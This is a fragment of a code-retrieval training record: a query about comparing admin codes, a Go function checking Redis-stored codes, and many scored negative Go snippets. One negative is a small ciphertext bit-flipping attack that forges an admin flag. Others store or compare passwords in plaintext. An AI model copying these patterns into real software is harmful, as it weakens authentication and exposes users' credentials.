"0.47769913", "0.47743255", "0.47706616", "0.47642365", "0.47638646", "0.4759697", "0.47587776", "0.4756542", "0.4755187", "0.47529602", "0.47419357", "0.47354218", "0.47326785", "0.47319615", "0.47286615", "0.47276855", "0.47254997", "0.47187278", "0.47169146", "0.47156718", "0.47149765", "0.47134116", "0.47058365", "0.47038966", "0.47006348", "0.469522", "0.46939462", "0.4693581", "0.46933687", "0.46895328", "0.46834037", "0.46819532", "0.46764278", "0.4673289", "0.4668805", "0.46686155", "0.46680245", "0.46649602", "0.46638912", "0.46618816" ]
0.7235184
0
CompareAdminCodes compares the admin code sent by user
func (orm *ORM) CompareAdminCodes(ctx context.Context, adminID string, code string) (bool, error) { //check in redis to see if its the same and not expired value, err := orm.rdb.Get(ctx, fmt.Sprintf("%s", adminID)).Result() if err == redis.Nil { return false, errors.New("CodeHasExpired") } else if err != nil { return false, err } if value != code { return false, errors.New("CodeIncorrect") } return true, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func checkAdmin(value int64) bool {\n\tfor _, i := range Config.Admins {\n\t\tif i == value {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func (o *CTROracle) CheckAdmin(ciphertext []byte) bool {\n\tctr := stream.NewCTR(o.Key, o.Nonce)\n\tdecrypted := string(ctr.Decrypt(ciphertext))\n\n\treturn strings.Index(decrypted, \";admin=true;\") >= 0\n}", "func admin(b []byte) bool {\n\tvar dec bytes.Buffer\n\tif err := common.NewCTR(key, nonce).Process(bytes.NewReader(b), &dec); err != nil {\n\t\tpanic(err)\n\t}\n\treturn bytes.Contains(dec.Bytes(), []byte(\";admin=true;\"))\n}", "func (c AESCBC) DecryptCheckAdmin(cipherText []byte) bool {\n\ttext := c.Decrypt(cipherText)\n\tfor _, val := range bytes.Split(text, []byte(\";\")) {\n\t\ttuple := bytes.Split(val, []byte(\"=\"))\n\t\t// If the tuple is of length 2, check if we have admin = true.\n\t\tif len(tuple) == 2 && bytes.Equal(tuple[0], []byte(\"admin\")) && bytes.Equal(tuple[1], []byte(\"true\")) {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func\tisAdmin(args []string) (string, error) {\n\tvar err\t\t\t\terror\n\tvar\tisAdmin\t\t\tbool\n\n\t/// CHECK ARGUMENTS\n\t/// TODO : when better API, check this better\n\tif len(args) != 0 {\n\t\treturn \"\", fmt.Errorf(\"isAdmin does not require any argument.\")\n\t}\n\n\tprintln(\"Some log\")\n\n\t/// IS USER ADMINISTRATOR\n\tisAdmin, err = isLedgerAdmin()\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"Cannot know is user is administrator.\")\n\t}\n\tif isAdmin == true {\n\t\treturn \"true\", nil\n\t} else {\n\t\treturn \"false\", nil\n\t}\n}", "func IsAdmin(ee engine.Exchange) sknet.HandlerFunc {\n\treturn func(c *sknet.Context) error {\n\t\tvar rlt *pp.EmptyRes\n\t\tfor {\n\t\t\treq := pp.UpdateCreditReq{}\n\t\t\tif err := c.BindJSON(&req); err != nil {\n\t\t\t\tlogger.Error(err.Error())\n\t\t\t\trlt = pp.MakeErrResWithCode(pp.ErrCode_WrongRequest)\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tif !ee.IsAdmin(req.GetPubkey()) {\n\t\t\t\tlogger.Error(\"not admin\")\n\t\t\t\trlt = pp.MakeErrResWithCode(pp.ErrCode_UnAuthorized)\n\t\t\t\tbreak\n\t\t\t}\n\t\t\treturn c.Next()\n\t\t}\n\t\treturn c.Error(rlt)\n\t}\n}", "func (s Service) checkAdminLevel(ctx context.Context, companyID string, requiredLevels ...companyadmin.AdminLevel) bool {\n\tspan := s.tracer.MakeSpan(ctx, \"checkAdminLevel\")\n\tdefer span.Finish()\n\n\tactualLevel, err := s.networkRPC.GetAdminLevel(ctx, companyID)\n\tif err != nil {\n\t\ts.tracer.LogError(span, err)\n\t\tlog.Println(\"Error: checkAdminLevel:\", err)\n\t\treturn false\n\t}\n\n\tfor _, lvl := range requiredLevels {\n\t\tif lvl == actualLevel {\n\t\t\treturn true\n\t\t}\n\t}\n\n\treturn false\n}", "func (o ClientCertificateCommonNameOutput) IsAdmin() pulumi.BoolOutput {\n\treturn o.ApplyT(func(v ClientCertificateCommonName) bool { return v.IsAdmin }).(pulumi.BoolOutput)\n}", "func (o *UpdateUserGroupsForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *UnixUserSettingsModifyOK) IsCode(code int) bool {\n\treturn code == 200\n}", "func (o ClientCertificateCommonNameResponseOutput) IsAdmin() pulumi.BoolOutput {\n\treturn o.ApplyT(func(v ClientCertificateCommonNameResponse) bool { return v.IsAdmin }).(pulumi.BoolOutput)\n}", "func authentication_admin(user, pass string) bool {\n\tvar username, password string\n\tvar tipo int\n\tdb_mu.Lock()\n\tquery2, err := db.Query(\"SELECT username, password, type FROM admin WHERE username = ?\", user)\n\tdb_mu.Unlock()\n\tif err != nil {\n\t\tError.Println(err)\n\t\treturn false\n\t}\n\tfor query2.Next() {\n\t\terr = query2.Scan(&username, &password, &tipo)\n\t\tif err != nil {\n\t\t\tError.Println(err)\n\t\t\treturn false\n\t\t}\n\t}\n\tquery2.Close()\n\n\tif user == username && pass == password && tipo == 1 {\n\t\treturn true\n\t} else {\n\t\treturn false\n\t}\n}", "func (_Contract *ContractFilterer) FilterAdminChanged(opts *bind.FilterOpts) (*ContractAdminChangedIterator, error) {\n\n\tlogs, sub, err := _Contract.contract.FilterLogs(opts, \"AdminChanged\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &ContractAdminChangedIterator{contract: _Contract.contract, event: \"AdminChanged\", logs: logs, sub: sub}, nil\n}", "func (o *UpdatePrivilegeForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *UpdateUserGroupsForbidden) Code() int {\n\treturn 403\n}", "func (c Admin) checkAdminIP() revel.Result {\n remoteAddr := GetRemoteAddr(c.Controller)\n if !app.MyGlobal.IsAdminIP(remoteAddr) {\n c.Flash.Error(c.Message(\"error.require.signin\"))\n revel.WARN.Printf(\"%s is not in the admin ip list\", remoteAddr)\n return c.Redirect(routes.User.Signin())\n }\n return c.Result\n}", "func (t *TokenInfo) IsAdmin() bool {\n\tfor _, role := range t.Roles {\n\t\tif role[\"name\"] == adminRoleName {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func (o *DcimInventoryItemRolesBulkUpdateOK) IsCode(code int) bool {\n\treturn code == 200\n}", "func (o *V2UpdateClusterUISettingsForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *SchemaObjectsUpdateForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *QueryScheduledScansForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *GetMachineSnapshotsForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (me TxsdImpactSimpleContentExtensionType) IsAdmin() bool { return me.String() == \"admin\" }", "func (o *QueryScansForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func CheckUrlCode(db *mgo.Database, params martini.Params) (err error) {\n\tuserId := bson.ObjectIdHex(params[\"user_id\"])\n\turlCode := params[\"password_resetting_code\"]\n\n\tvar aUser User\n\terr = db.C(\"users\").Find(bson.M{\"_id\": userId}).One(&aUser)\n\tif err == nil {\n\t\tif len(aUser.PasswordResettingUrlCodes) > 0 {\n\t\t\tfor _, u := range aUser.PasswordResettingUrlCodes {\n\t\t\t\tif u.PasswordResettingUrlCode == urlCode {\n\t\t\t\t\tif time.Now().UnixNano()-u.TimeStamp < (3.6e+12) {\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\tif err == nil {\n\t\terr = errors.New(\"Previous change was successful or the link is expired.\")\n\t}\n\treturn\n}", "func (o *UpdateRepository3Forbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *UpdatePrivilegeForbidden) Code() int {\n\treturn 403\n}", "func (o *ListDashboardsForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *ListNodePoolsUnauthorized) IsCode(code int) bool {\n\treturn code == 401\n}", "func IsAdmin(userName string) bool {\n\tif strings.ToUpper(userName) == strings.ToUpper(os.Getenv(\"CLAIMR_SUPERUSER\")) {\n\t\treturn true\n\t}\n\n\tfor _, admin := range Admins {\n\t\tif strings.ToUpper(userName) == strings.ToUpper(admin.ID) {\n\t\t\treturn true\n\t\t}\n\t}\n\n\treturn false\n}", "func (o *UpdateUserGroupsMultiStatus) IsCode(code int) bool {\n\treturn code == 207\n}", "func isAdmin(user string) bool {\n\treturn user == ROOT1 || user == ROOT2\n}", "func (o *V2UpdateClusterUISettingsUnauthorized) IsCode(code int) bool {\n\treturn code == 401\n}", "func isAdmin(res http.ResponseWriter, req *http.Request) bool {\n\tmyUser := getUser(res, req)\n\treturn myUser.Username == \"admin\"\n}", "func (o *GetCombinedSensorInstallersByQueryForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *PcloudCloudinstancesSnapshotsGetallForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *SchemaObjectsUpdateUnauthorized) IsCode(code int) bool {\n\treturn code == 401\n}", "func (o *UpdatePrivilegeNotFound) IsCode(code int) bool {\n\treturn code == 404\n}", "func (c *Context) RunAdmin(fn testFunc) {\n\tif c.Admin != nil {\n\t\tc.Run(\"Admin\", fn)\n\t}\n}", "func (ua *UserAddress) Compare(uat *UserAddress) ([]app.Invalid, error) {\n\tvar inv []app.Invalid\n\n\tif ua.Type != uat.Type {\n\t\tinv = append(inv, app.Invalid{Fld: \"Type\", Err: fmt.Sprintf(\"The value of Type is not the same. %d != %d\", ua.Type, uat.Type)})\n\t}\n\n\tif ua.LineOne != uat.LineOne {\n\t\tinv = append(inv, app.Invalid{Fld: \"LineOne\", Err: fmt.Sprintf(\"The value of LineOne is not the same. %s != %s\", ua.LineOne, uat.LineOne)})\n\t}\n\n\tif ua.City != uat.City {\n\t\tinv = append(inv, app.Invalid{Fld: \"City\", Err: fmt.Sprintf(\"The value of City is not the same. %s != %s\", ua.City, uat.City)})\n\t}\n\n\tif ua.State != uat.State {\n\t\tinv = append(inv, app.Invalid{Fld: \"State\", Err: fmt.Sprintf(\"The value of State is not the same. %s != %s\", ua.State, uat.State)})\n\t}\n\n\tif ua.Zipcode != uat.Zipcode {\n\t\tinv = append(inv, app.Invalid{Fld: \"Zipcode\", Err: fmt.Sprintf(\"The value of Zipcode is not the same. %s != %s\", ua.Zipcode, uat.Zipcode)})\n\t}\n\n\tif ua.Phone != uat.Phone {\n\t\tinv = append(inv, app.Invalid{Fld: \"Phone\", Err: fmt.Sprintf(\"The value of Phone is not the same. %s != %s\", ua.Phone, uat.Phone)})\n\t}\n\n\tif len(inv) > 0 {\n\t\treturn inv, errors.New(\"Compare failures identified\")\n\t}\n\n\treturn nil, nil\n}", "func (d *DB) IsAdmin(uuid string) (bool, error) {\n\tcnt := 0\n\tr := d.db.QueryRow(\"SELECT COUNT(*) FROM teammember INNER JOIN username ON teamuuid = uuid WHERE useruuid = $1 AND username = $2\", uuid, teamNameAdmin)\n\terr := r.Scan(&cnt)\n\tif err != nil {\n\t\treturn false, err\n\t}\n\n\treturn cnt == 1, nil\n}", "func (o *GetDeploymentActionsUsingGET2Unauthorized) IsCode(code int) bool {\n\treturn code == 401\n}", "func (i *IRC) AdminLevel(source string) int {\n\tfor _, a := range i.Admins {\n\t\tlowerAdmin := strings.ToLower(a.Mask)\n\t\tlowerSource := strings.ToLower(source)\n\n\t\tif util.GlobToRegexp(lowerAdmin).MatchString(lowerSource) {\n\t\t\treturn a.Level\n\t\t}\n\t}\n\n\treturn 0\n}", "func (o *QueryScansForbidden) Code() int {\n\treturn 403\n}", "func (o *GetConfigurationSourceTreeUsingGETForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func IsAdmin(email string) bool {\n\tfor _, admin := range GetAdmins() {\n\t\tif email == admin {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func (o *UpdateRepository24Forbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *ArchiveRunsForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *AggregateScansForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *V2ReportMonitoredOperatorStatusForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *QueryApplicationsForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func Compare(encoded string, plain string) bool {\n\terr := bcrypt.CompareHashAndPassword([]byte(encoded), []byte(plain))\n\treturn err == nil\n}", "func (o *QueryApplicationsForbidden) Code() int {\n\treturn 403\n}", "func (o *QueryScheduledScansForbidden) Code() int {\n\treturn 403\n}", "func CheckAuthCodeByUserAndCode(userID int64, code string) (bool, error) {\n\treturn database.Orm.Table(\"auth_code\").Exist(\n\t\t&entity.AuthCode{\n\t\t\tUserID: userID,\n\t\t\tCode: code,\n\t\t})\n}", "func adminAccessTest(t *testing.T, r *http.Request, h http.Handler, auth *mock.Authenticator,\n\toutputTester func(*http.Response)) {\n\n\toriginal := auth.GetAuthInfoFn\n\tauth.GetAuthInfoFn = getAuthInfoGenerator(\"\", false, errors.New(\"An error\"))\n\tw := httptest.NewRecorder()\n\th.ServeHTTP(w, r)\n\ttest.Equals(t, http.StatusBadRequest, w.Result().StatusCode)\n\tauth.GetAuthInfoFn = getAuthInfoGenerator(\"random_admin_name\", true, nil)\n\tw = httptest.NewRecorder()\n\th.ServeHTTP(w, r)\n\toutputTester(w.Result())\n\tauth.GetAuthInfoFn = original\n}", "func (me TxsdContactRole) IsAdmin() bool { return me.String() == \"admin\" }", "func (s UserAuthServiceImpl) CheckAdmin() (*dto.UserAuth, error) {\n\n\tfilter := struct {\n\t\tRole string `json:\"role\" bson:\"role\"`\n\t}{\n\t\tRole: \"admin\",\n\t}\n\treturn s.FindOneUserAuth(filter)\n}", "func (o *EquipmentIdentityAllOf) GetAdminActionOk() (*string, bool) {\n\tif o == nil || o.AdminAction == nil {\n\t\treturn nil, false\n\t}\n\treturn o.AdminAction, true\n}", "func (o *TransferRunsForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *UpdateFirewallPoliciesForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *GetVersionStagesForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *UpdateIOAExclusionsV1Forbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *UserRolesActionV1Forbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *UpdateUserGroupsMultiStatus) Code() int {\n\treturn 207\n}", "func (o *ArchiveRunsForbidden) Code() int {\n\treturn 403\n}", "func (_Cakevault *CakevaultCaller) Admin(opts *bind.CallOpts) (common.Address, error) {\n\tvar out []interface{}\n\terr := _Cakevault.contract.Call(opts, &out, \"admin\")\n\n\tif err != nil {\n\t\treturn *new(common.Address), err\n\t}\n\n\tout0 := *abi.ConvertType(out[0], new(common.Address)).(*common.Address)\n\n\treturn out0, err\n\n}", "func (o *TransferRunsForbidden) Code() int {\n\treturn 403\n}", "func (o *EmsConfigModifyOK) IsCode(code int) bool {\n\treturn code == 200\n}", "func (o *DcimRackRolesBulkPartialUpdateOK) IsCode(code int) bool {\n\treturn code == 200\n}", "func (o *GetCustomIntegrationVersionByIDUsingGETForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *ListDashboardsForbidden) Code() int {\n\treturn 403\n}", "func (o *UpdateLoggedInAthleteDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *BackupsCreateStatusForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (serv *ExchangeServer) IsAdmin(pubkey string) bool {\n\tlogger.Debug(\"admins:%s, pubkey:%s\", serv.cfg.Admins, pubkey)\n\treturn strings.Contains(serv.cfg.Admins, pubkey)\n}", "func (o *SchemaObjectsUpdateForbidden) Code() int {\n\treturn 403\n}", "func (o *UpdateRepository3Unauthorized) IsCode(code int) bool {\n\treturn code == 401\n}", "func (o *ReorderSecurityRealmsOK) IsCode(code int) bool {\n\treturn code == 200\n}", "func (o *ListTemplatesForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func UpdateAuthorizationCode(mongo *mongo.Client, login, code string, codeValidUntil time.Time) error {\n\tfieldsToUpdate := primitive.D{\n\t\t{\"auth.code\", code},\n\t\t{\"auth.codeValidUntil\", codeValidUntil},\n\t}\n\n\treturn updateUser(mongo, login, fieldsToUpdate)\n}", "func (o *ListNodePoolsForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (u *User) Compare(ut *User) ([]app.Invalid, error) {\n\tvar inv []app.Invalid\n\n\tif u.UserType != ut.UserType {\n\t\tinv = append(inv, app.Invalid{Fld: \"UserType\", Err: fmt.Sprintf(\"The value of UserType is not the same. %d != %d\", u.UserType, ut.UserType)})\n\t}\n\n\tif u.FirstName != ut.FirstName {\n\t\tinv = append(inv, app.Invalid{Fld: \"FirstName\", Err: fmt.Sprintf(\"The value of FirstName is not the same. %s != %s\", u.FirstName, ut.FirstName)})\n\t}\n\n\tif u.LastName != ut.LastName {\n\t\tinv = append(inv, app.Invalid{Fld: \"LastName\", Err: fmt.Sprintf(\"The value of LastName is not the same. %s != %s\", u.LastName, ut.LastName)})\n\t}\n\n\tif u.Email != ut.Email {\n\t\tinv = append(inv, app.Invalid{Fld: \"Email\", Err: fmt.Sprintf(\"The value of Email is not the same. %s != %s\", u.Email, ut.Email)})\n\t}\n\n\tif u.Company != ut.Company {\n\t\tinv = append(inv, app.Invalid{Fld: \"Company\", Err: fmt.Sprintf(\"The value of Company is not the same. %s != %s\", u.Company, ut.Company)})\n\t}\n\n\tuLen := len(u.Addresses)\n\tutLen := len(ut.Addresses)\n\n\tif uLen != utLen {\n\t\tinv = append(inv, app.Invalid{Fld: \"Addresses\", Err: fmt.Sprintf(\"The set of Addresses is not the same. %d != %d\", uLen, utLen)})\n\t}\n\n\tfor idx, ua := range u.Addresses {\n\t\tif idx >= utLen {\n\t\t\tbreak\n\t\t}\n\n\t\tif va, err := ua.Compare(&ut.Addresses[idx]); err != nil {\n\t\t\tinv = append(inv, va...)\n\t\t}\n\t}\n\n\tif len(inv) > 0 {\n\t\treturn inv, errors.New(\"Compare failures identified\")\n\t}\n\n\treturn nil, nil\n}", "func (o *UnixUserSettingsModifyDefault) IsCode(code int) bool {\n\treturn o._statusCode == code\n}", "func Solve() string {\n\tct := encryptUserData(make([]byte, 32))\n\tblock := bytes.Xor(ct[32:48], []byte(\"<--->;admin=true\"))\n\tfor i := range block {\n\t\tct[32+i] = block[i]\n\t}\n\treturn getAdmin(ct)\n}", "func (o *AggregateScansForbidden) Code() int {\n\treturn 403\n}", "func isAdmin(ctx iris.Context) (bool, error) {\n\tu, err := bearerToUser(ctx)\n\tif err != nil {\n\t\treturn false, err\n\t}\n\treturn u.Active && u.Role == models.AdminRole, nil\n}", "func (o *ListNodePoolsUnauthorized) Code() int {\n\treturn 401\n}", "func (o *QueryGroupMembersForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func ValidAdmin(organization string, w http.ResponseWriter, r *http.Request) bool {\n\ttoken, err := authsdk.NewJWTTokenFromRequest(r)\n\tif err != nil {\n\t\tfmt.Printf(\"Error getting JWT Token: %v\\n\", err)\n\t\thttp.Error(w, \"Invalid Token\", http.StatusUnauthorized) //401\n\t\treturn false\n\t}\n\tisAdmin, err := token.IsOrgAdmin(organization)\n\tif err != nil {\n\t\tfmt.Printf(\"Error checking caller is an Org Admin: %v\\n\", err) //401\n\t\thttp.Error(w, \"\", http.StatusUnauthorized)\n\t\treturn false\n\t}\n\tif !isAdmin {\n\t\t//Throwing a 403\n\t\tfmt.Printf(\"Caller isn't an Org Admin\\n\")\n\t\thttp.Error(w, \"You aren't an Org Admin\", http.StatusForbidden) //403\n\t\treturn false\n\t}\n\treturn true\n}", "func (o *GetConfigurationSourceTreeUsingGETUnauthorized) IsCode(code int) bool {\n\treturn code == 401\n}", "func (o *GetExecutionByIndexAndPipelineIDUsingGETForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *ResetPasswordForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *ListPeerFoldersForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *UpdateUserGroupsOK) IsCode(code int) bool {\n\treturn code == 200\n}", "func (o *UpdateRepository24Unauthorized) IsCode(code int) bool {\n\treturn code == 401\n}", "func (o *V2ReportMonitoredOperatorStatusUnauthorized) IsCode(code int) bool {\n\treturn code == 401\n}", "func (o *V2ReportMonitoredOperatorStatusOK) IsCode(code int) bool {\n\treturn code == 200\n}", "func (o *GetCustomNameByProjectIDForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *GetAllProjectsUsingGETForbidden) IsCode(code int) bool {\n\treturn code == 403\n}", "func (o *UserGetMeForbidden) IsCode(code int) bool {\n\treturn code == 403\n}" ]
[ "0.5926233", "0.5840442", "0.5440513", "0.5376668", "0.53707075", "0.5186763", "0.51571697", "0.51361406", "0.50601006", "0.5047268", "0.50200075", "0.5019204", "0.5016419", "0.50071216", "0.49842063", "0.49710804", "0.49564472", "0.494138", "0.49289712", "0.490529", "0.4904008", "0.48821637", "0.48757583", "0.48737934", "0.48631513", "0.48557422", "0.48521128", "0.48486784", "0.48420912", "0.48417586", "0.48389938", "0.48387638", "0.48295626", "0.48280606", "0.4827514", "0.4823496", "0.48161057", "0.48160657", "0.48152265", "0.48146048", "0.48118976", "0.48092732", "0.4806036", "0.48030517", "0.4799389", "0.4796701", "0.4793236", "0.4792485", "0.4788446", "0.47856012", "0.47837833", "0.4781452", "0.4780616", "0.47751066", "0.47702488", "0.47542223", "0.47472376", "0.47465506", "0.47371018", "0.47247368", "0.47233585", "0.47207633", "0.4716049", "0.47090596", "0.47044012", "0.47036806", "0.47033784", "0.47025412", "0.4702024", "0.46989673", "0.46985346", "0.469381", "0.4691421", "0.4689572", "0.4687976", "0.46873912", "0.4687076", "0.46843886", "0.46841183", "0.4681158", "0.46795994", "0.4678439", "0.467512", "0.4674532", "0.46702713", "0.46700907", "0.46693414", "0.4665599", "0.46642745", "0.46635595", "0.46624452", "0.46563628", "0.4652273", "0.46519965", "0.464911", "0.46480754", "0.46409523", "0.4638726", "0.46347302", "0.4629413" ]
0.80040187
0
ResetPassword updates the admins new password
func (orm *ORM) ResetPassword(ctx context.Context, adminID string, password string) (bool, error) { var _Admin models.Admin err := orm.DB.DB.First(&_Admin, "id = ?", adminID).Error if errors.Is(err, gorm.ErrRecordNotFound) { return false, errors.New("AdminNotFound") } //update password _Admin.Password = password orm.DB.DB.Save(&_Admin) //invalidate the redis data pertaining to this admin redisErr := orm.rdb.Set(ctx, fmt.Sprintf("%s", adminID), nil, 1*time.Second).Err() if redisErr != nil { return false, redisErr } return true, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (as *AdminServer) ResetPassword(w http.ResponseWriter, r *http.Request) {\n\tu := ctx.Get(r, \"user\").(models.User)\n\tsession := ctx.Get(r, \"session\").(*sessions.Session)\n\tif !u.PasswordChangeRequired {\n\t\tFlash(w, r, \"info\", \"Please reset your password through the settings page\")\n\t\tsession.Save(r, w)\n\t\thttp.Redirect(w, r, \"/settings\", http.StatusTemporaryRedirect)\n\t\treturn\n\t}\n\tparams := newTemplateParams(r)\n\tparams.Title = \"Reset Password\"\n\tswitch {\n\tcase r.Method == http.MethodGet:\n\t\tparams.Flashes = session.Flashes()\n\t\tsession.Save(r, w)\n\t\tgetTemplate(w, \"reset_password\").ExecuteTemplate(w, \"base\", params)\n\t\treturn\n\tcase r.Method == http.MethodPost:\n\t\tnewPassword := r.FormValue(\"password\")\n\t\tconfirmPassword := r.FormValue(\"confirm_password\")\n\t\tnewHash, err := auth.ValidatePasswordChange(u.Hash, newPassword, confirmPassword)\n\t\tif err != nil {\n\t\t\tFlash(w, r, \"danger\", err.Error())\n\t\t\tparams.Flashes = session.Flashes()\n\t\t\tsession.Save(r, w)\n\t\t\tw.WriteHeader(http.StatusBadRequest)\n\t\t\tgetTemplate(w, \"reset_password\").ExecuteTemplate(w, \"base\", params)\n\t\t\treturn\n\t\t}\n\t\tu.PasswordChangeRequired = false\n\t\tu.Hash = newHash\n\t\tif err = models.PutUser(&u); err != nil {\n\t\t\tFlash(w, r, \"danger\", err.Error())\n\t\t\tparams.Flashes = session.Flashes()\n\t\t\tsession.Save(r, w)\n\t\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\t\tgetTemplate(w, \"reset_password\").ExecuteTemplate(w, \"base\", params)\n\t\t\treturn\n\t\t}\n\t\t// TODO: We probably want to flash a message here that the password was\n\t\t// changed successfully. The problem is that when the user resets their\n\t\t// password on first use, they will see two flashes on the dashboard-\n\t\t// one for their password reset, and one for the \"no campaigns created\".\n\t\t//\n\t\t// The solution to this is to revamp the empty page to be more useful,\n\t\t// like a wizard or something.\n\t\tas.nextOrIndex(w, r)\n\t}\n}", "func resetPassword(w http.ResponseWriter, req *http.Request) {\n\n\tuserData, _ := getUserAndSession(w, req)\n\n\tif !userData.LoggedIn {\n\t\thttp.Redirect(w, req, \"/\", http.StatusSeeOther)\n\t\treturn\n\t}\n\n\tif req.Method == http.MethodPost {\n\n\t\t// Get posted password\n\t\tnewPassword := req.FormValue(\"password\")\n\n\t\t// Ecrypt password before storing it. If the encryption errs, respond with\n\t\t// an Internal Server Error.\n\t\tencryptedPassword, err := getEncryptedPassword(newPassword)\n\t\tif err != nil {\n\t\t\thttp.Error(w, \"Internal server error\", http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\n\t\t// Update user in dbUsers map\n\t\tuserData.Password = encryptedPassword\n\t\tdbUsers[userData.UserID] = userData\n\n\t\t// Redirect to Home page after changing password\n\t\thttp.Redirect(w, req, \"/\", http.StatusSeeOther)\n\t\treturn\n\t}\n\n\ttpl.ExecuteTemplate(w, \"resetPassword.gohtml\", userData)\n}", "func ResetPassword(w http.ResponseWriter, r *http.Request) {\n\tauth := service.GetSessionMember(r)\n\tvars := mux.Vars(r)\n\tid := vars[\"id\"]\n\n\tmemberID, _ := strconv.Atoi(id)\n\tmember := model.GetMemberByID(memberID)\n\n\tif err := r.ParseMultipartForm(setting.FileMaxSize); err != nil {\n\t\tLogger.Error(err.Error())\n\t}\n\n\tnewPassword := r.FormValue(\"newPassword\")\n\tconfirmPassword := r.FormValue(\"confirmPassword\")\n\n\tpasswordData := map[string]string{\n\t\t\"password\": newPassword,\n\t\t\"confirmPassword\": confirmPassword,\n\t}\n\n\tvalidateError := model.ValidatePassword(passwordData)\n\n\tif len(validateError) == 0 {\n\t\tmodel.UpdatePassword(newPassword, member)\n\t\thttp.Redirect(w, r, \"/admin/members/\"+id, 301)\n\t}\n\n\ttemplateData := map[string]interface{}{\n\t\t\"title\": \"Reset Password\",\n\t\t\"validateError\": validateError,\n\t\t\"id\": id,\n\t\t\"auth\": auth,\n\t\t\"tab\": setting.MembersTab,\n\t}\n\n\ttmpl := template.Must(template.ParseFiles(\"template/admin_members/reset_password.tmpl\", setting.AdminTemplate))\n\tif err := tmpl.ExecuteTemplate(w, \"base\", templateData); err != nil {\n\t\tLogger.Error(err.Error())\n\t}\n}", "func (uc UsersController) ResetPassword(w http.ResponseWriter, r *http.Request, _ httprouter.Params) {\n\tfmt.Fprint(w, \"User.ResetPassword\")\n}", "func (app *application) ResetPassword(w http.ResponseWriter, r *http.Request) {\n\tvar payload struct {\n\t\tEmail string `json:\"email\"`\n\t\tPassword string `json:\"password\"`\n\t}\n\n\terr := app.readJSON(w, r, &payload)\n\tif err != nil {\n\t\tapp.badRequest(w, r, err)\n\t\treturn\n\t}\n\n\t// decrypt email\n\tencryptor := encryption.Encryption {\n\t\tKey: []byte(app.config.secretkey),\n\t}\n\n\trealEmail, err := encryptor.Decrypt(payload.Email)\n\tif err != nil {\n\t\tapp.badRequest(w, r, err)\n\t\treturn\n\t}\n\n\tuser, err := app.DB.GetUserByEmail(realEmail)\n\tif err != nil {\n\t\tapp.badRequest(w, r, err)\n\t\treturn\n\t}\n\n\t// create hash using new password\n\tnewHash, err := bcrypt.GenerateFromPassword([]byte(payload.Password), 12)\n\tif err != nil {\n\t\tapp.badRequest(w, r, err)\n\t\treturn\n\t}\n\n\terr = app.DB.UpdatePasswordForUser(user, string(newHash))\n\tif err != nil {\n\t\tapp.badRequest(w, r, err)\n\t\treturn\n\t}\n\n\tvar resp struct {\n\t\tError bool `json:\"error\"`\n\t\tMessage string \t`json:\"message\"`\n\t}\n\tresp.Error = false\n\tresp.Message = \"password changed\"\n\n\tapp.writeJSON(w, http.StatusCreated, resp)\n}", "func (ad *admininterface) AdminResetUserPassword(username string) error {\n\taccount, err := ad.Get(username)\n\tif err != nil {\n\t\treturn err\n\t}\n\taccount.PasswordHash = \"\"\n\taccount.MustChangePassword = true\n\treturn ad.Upd(account)\n}", "func Reset(c *fiber.Ctx) error {\n\tvar data map[string]string\n\n\terr := c.BodyParser(&data)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif data[\"password\"] != data[\"password_confirm\"] {\n\t\tc.Status(400)\n\t\treturn c.JSON(fiber.Map{\n\t\t\t\"messgae\": \"Passwords do not match\",\n\t\t})\n\t}\n\n\tvar passwordReset = models.PasswordReset{}\n\n\tif err := database.DB.Where(\"token = ?\", data[\"token\"]).Last(&passwordReset); err.Error != nil {\n\t\tc.Status(400)\n\t\treturn c.JSON(fiber.Map{\n\t\t\t\"messgae\": \"Invalid Token!\",\n\t\t})\n\t}\n\n\tpassword, _ := 